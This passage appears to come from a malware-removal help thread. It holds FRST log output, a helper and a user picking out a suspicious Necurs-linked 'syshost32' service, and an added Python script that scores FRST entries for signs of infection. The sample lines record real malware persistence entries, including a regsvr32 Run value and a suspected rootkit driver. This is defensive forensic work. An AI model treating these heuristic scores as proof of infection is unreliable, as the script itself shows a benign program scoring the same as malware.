C:\Windows\SysWOW64\User32.dll => MD5 is legit
C:\Windows\System32\userinit.exe => MD5 is legit
C:\Windows\SysWOW64\userinit.exe => MD5 is legit
C:\Windows\System32\rpcss.dll => MD5 is legit
C:\Windows\System32\Drivers\volsnap.sys => MD5 is legit
==================== Restore Points =========================
Restore point made on: 2015-07-14 15:00:12
==================== Memory info ===========================
Percentage of memory in use: 10%
Total physical RAM: 8104.63 MB
Available physical RAM: 7266.64 MB
Total Virtual: 8102.83 MB
Available Virtual: 7259.28 MB
==================== Drives ================================
Drive c: (OS) (Fixed) (Total:450.91 GB) (Free:145.41 GB) NTFS
Drive d: (GSP1RMCHPXFRER_EN_DVD) (CDROM) (Total:3.09 GB) (Free:0 GB) UDF
Drive g: (RECOVERY) (Fixed) (Total:14.81 GB) (Free:5.74 GB) NTFS ==>[system with boot components (obtained from reading drive)]
Drive h: (TOSHIBA EXT) (Fixed) (Total:465.76 GB) (Free:462.85 GB) NTFS
Drive x: (Boot) (Fixed) (Total:0.03 GB) (Free:0.03 GB) NTFS
==================== MBR & Partition Table ==================
========================================================
Disk: 0 (MBR Code: Windows 7 or 8) (Size: 465.8 GB) (Disk ID: ACEA298C)
Partition 1: (Not Active) - (Size=39 MB) - (Type=DE)
Partition 2: (Active) - (Size=14.8 GB) - (Type=07 NTFS)
Partition 3: (Not Active) - (Size=450.9 GB) - (Type=07 NTFS)
========================================================
Disk: 1 (MBR Code: Windows 7 or Vista) (Size: 465.8 GB) (Disk ID: 35E8B3A5)
Partition 1: (Not Active) - (Size=465.8 GB) - (Type=07 NTFS)

LastRegBack: 2015-07-14 03:56
==================== End of log ============================
 
I see it now! Give me some time to go over the log more closely and then I'll provide new instructions.
 
Oh ok!!

Is this the line?

S2 syshost32; C:\Windows\Installer\{269A4ED8-3094-6D54-48F0-3CC425AC5ECE}\syshost.exe [196923 2015-07-14] ()
 
You have a good eye. Yes, that is it but I want to check some other things as well. It goes by the name "Necurs" but other files I had seen in your previous log referenced a backdoor bot.
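Added here as an illustration of what the helper is reading for in the Services and Drivers sections above: a small Python triage (not part of this thread, and not FRST's own logic) that parses FRST Run, service and driver lines and weights the traits visible in these logs, namely an empty () publisher field, a user-writable path, a random-looking file name, a kernel driver without a publisher, a Run value that goes through regsvr32, and a missing file. The weights and the threshold are this example's own assumptions; the sample lines are copied from the logs in this thread.

```python
import re
# FRST line shapes for Run values, services and drivers, as they appear in the logs in this thread.
RUN_RE = re.compile(r"^HK.+?\\\.\.\.\\Run\w*: \[(?P<name>[^\]]+)\] => (?P<rest>.*)$")
SVC_RE = re.compile(r"^[SR]\d (?P<name>[^;]+); (?P<rest>.*)$")
# "<path> [<size> <date>] (<company>)": an empty "()" means FRST found no publisher information.
TAIL_RE = re.compile(r'^"?(?P<path>[^"\[]+?)"? \[\d+ \d{4}-\d\d-\d\d\] \((?P<company>[^)]*)\)(?: <=.*)?$')
MISSING_RE = re.compile(r'^"?(?P<path>[^"\[]+?)"? \[X\]$')  # [X]: file not present on disk
USER_WRITABLE = ("\\appdata\\", "\\programdata\\", "\\users\\", "\\windows\\installer\\", "\\temp\\")
HEX_NAME = re.compile(r"^[0-9a-f]{12,}$")

def parse_entry(line):
    """Return a dict for one FRST Run/service/driver line, or None for any other line."""
    m, kind = RUN_RE.match(line.strip()), "run"
    if not m:
        m, kind = SVC_RE.match(line.strip()), "service"
    if not m:
        return None
    rest = m["rest"].strip()
    rest = rest[4:] if rest.startswith("\\??\\") else rest  # drop NT device-path prefix on drivers
    e = {"kind": kind, "name": m["name"].strip(), "path": rest, "company": None, "missing": False}
    tail, gone = TAIL_RE.match(rest), MISSING_RE.match(rest)
    if tail:
        e.update(path=tail["path"], company=tail["company"])
    elif gone:
        e.update(path=gone["path"], missing=True)
    if kind == "service" and e["path"].lower().endswith(".sys"):
        e["kind"] = "driver"
    return e

def looks_random(stem):
    """Hex-only names (8b66cd9be5c7a4f2) or near vowel-less letter runs (fqjnrwka) look generated."""
    return bool(HEX_NAME.match(stem)) or (
        len(stem) >= 8 and stem.isalpha() and sum(c in "aeiou" for c in stem) <= 1)

def score_entry(e):
    """Weight the traits an analyst looks for in an FRST entry; returns (score, reasons)."""
    p = e["path"].lower()
    stem = p.rsplit("\\", 1)[-1].rsplit(".", 1)[0]
    checks = [  # (weight, condition, reason): weights are this example's own, not FRST's
        (2, e["company"] == "", "no publisher in FRST's () field"),
        (2, any(s in p for s in USER_WRITABLE), "executes from a user-writable location"),
        (3, not e["company"] and looks_random(stem), "random-looking file name"),
        (3, e["kind"] == "driver" and e["company"] == "", "kernel driver without publisher"),
        (3, e["kind"] == "run" and p.startswith(("regsvr32", "rundll32")), "started via regsvr32/rundll32"),
        (1, e["missing"], "file missing on disk (stale entry)"),
    ]
    hits = [(w, why) for w, cond, why in checks if cond]
    return sum(w for w, _ in hits), [why for _, why in hits]

def triage(lines, threshold=3):
    """Parse every line and return the entries scoring at or above threshold, highest first."""
    out = []
    for e in filter(None, map(parse_entry, lines)):
        score, reasons = score_entry(e)
        if score >= threshold:
            out.append({**e, "score": score, "reasons": reasons})
    return sorted(out, key=lambda h: -h["score"])

# Sample lines copied from the FRST logs in this thread, benign ones included for contrast.
SAMPLE_LOG = [
    r"HKU\Thomas\...\Run: [Amazon Music] => C:\Users\Thomas\AppData\Local\Amazon Music\Amazon Music Helper.exe [6277952 2014-12-07] ()",
    r"HKU\Thomas\...\Run: [d3dxawex] => C:\Users\Thomas\AppData\Roaming\C_G1awex.exe [266240 2015-07-13] ()",
    r'HKU\Thomas\...\Run: [DifhAvud] => regsvr32.exe "C:\ProgramData\DifhAvud\AixpIvum.nyz"',
    r'S2 NetworkHostSrv; "C:\ProgramData\Online\sv.exe" [X]',
    r"S0 8b66cd9be5c7a4f2; C:\Windows\System32\Drivers\8b66cd9be5c7a4f2.sys [94152 2015-07-14] () <===== ATTENTION Necurs Rootkit?",
    r"S1 fqjnrwka; \??\C:\Windows\system32\drivers\fqjnrwka.sys [X]",
    r"S2 syshost32; C:\Windows\Installer\{269A4ED8-3094-6D54-48F0-3CC425AC5ECE}\syshost.exe [196923 2015-07-14] ()",
    r"S3 cfwids; C:\Windows\System32\drivers\cfwids.sys [68784 2015-02-17] (McAfee, Inc.)",
    r"S3 MBAMSwissArmy; \??\C:\Windows\system32\drivers\MBAMSwissArmy.sys [X]",
]
```

A score is only a prompt to look closer: the Amazon Music helper from the same log scores the same 4 as C_G1awex.exe, which is why the file itself still gets checked rather than trusting the list alone.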
 